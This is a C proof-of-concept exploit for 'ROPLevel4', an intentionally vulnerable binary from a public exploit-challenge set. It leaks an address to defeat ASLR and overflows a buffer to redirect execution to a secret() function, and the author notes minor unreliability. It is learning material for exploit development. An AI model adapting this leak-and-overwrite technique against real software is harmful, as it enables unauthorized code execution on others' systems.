exploit_for_roplevel4

1. // Exploit for ROPLevel4
2. // PoC by Billy Ellis (@bellis1000)
3. // Full write up available (soon?) on http://billyellis.net
4. // Download the ROPLevel4 binary from https://github.com/Billy-Ellis/Exploit-Challenges
5.  
6. #import <stdio.h>
7. #import <string.h>
8. #import <unistd.h>
9. #import <stdlib.h>
10. #import <fcntl.h>
11. #import <sys/types.h>
12.  
13. //probably should clear this up and split it in to separate functions but oh well ;-)
14.  
15. int main(){
16.    
17.     //fixed addresses can be found by statically analysing the binary
18.  
19.     int fixedAddr = 0xc03c;
20.     int secretAddr = 0xbd28;
21.    
22.     //we'll use this eventually to store the final payload
23.  
24.     char exploit[128];
25.    
26.     //junk chars or "padding"
27.    
28.     char string[64] = {0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41};
29.  
30.     //this will be used to store the leaked address
31.    
32.     char readData[16];
33.  
34.     int fd[2];
35.     pid_t pid1;
36.     pipe(fd);
37.    
38.     pid1 = fork();
39.    
40.     //pipe stuff, thanks @liveoverflow for help with this :)
41.  
42.     if (pid1 == 0) {
43.    
44.         close(fd[1]);
45.         dup2(fd[0],0);
46.         //execute roplevel4
47.         execv("./roplevel4", NULL);
48.    
49.     }
50.  
51.     printf("[*] Reading leaked address...\n");
52.  
53.     //wait 3 secs to ensure file containing info leak is created successfully
54.    
55.     sleep(3);
56.    
57.     //open and read contents of file into readData
58.  
59.     FILE *file = fopen("./leak.txt","r");
60.     fgets(readData,32,file);
61.     fclose(file);
62.    
63.     //then convert the string to an int so we can actually use it for calculations
64.  
65.     int addr;
66.  
67.     sscanf(readData,"%x",&addr);
68.     printf("%x\n",addr);
69.    
70.     //calculate the ASLR "slide" or offset by working out the difference between the static addr & the real addr
71.    
72.     int offset = addr - fixedAddr;
73.  
74.     printf("[*] ASLR offset is: %x\n",offset);
75.    
76.     //calculate the real addr of the secret() function by adding the offset
77.  
78.     secretAddr = secretAddr + offset;
79.  
80.     printf("[*] Calculated address of secret() - %x\n",secretAddr);
81.  
82.     printf("[*] Crafting exploit payload...\n");
83.    
84.     //probably could have done this in a better way, but it works ;P
85.     //basically adds the bytes of the calculated address to the junk chars and stores them in the exploit array
86.  
87.     unsigned int one = secretAddr & 0xff;
88.     unsigned int two = (secretAddr>>8) & 0xff;
89.     unsigned int three = (secretAddr>>16) & 0xff;
90.     unsigned int four = (secretAddr>>24) & 0xff;
91.  
92.     sprintf(exploit,"%s%c%c%c",string,one,two,three);
93.  
94.     printf("[*] Payload crafted!\n[*] Executing...\n");
95.  
96.     close(fd[0]);
97.    
98.     //send the payload & hope for the best ;P
99.    
100.     //not 100% reliability, something to do with how I added the bytes to the string
101.     //I'll probably improve as I learn more C
102.    
103.     write(fd[1],exploit,512);
104.  
105.     return 0;
106.    
107. }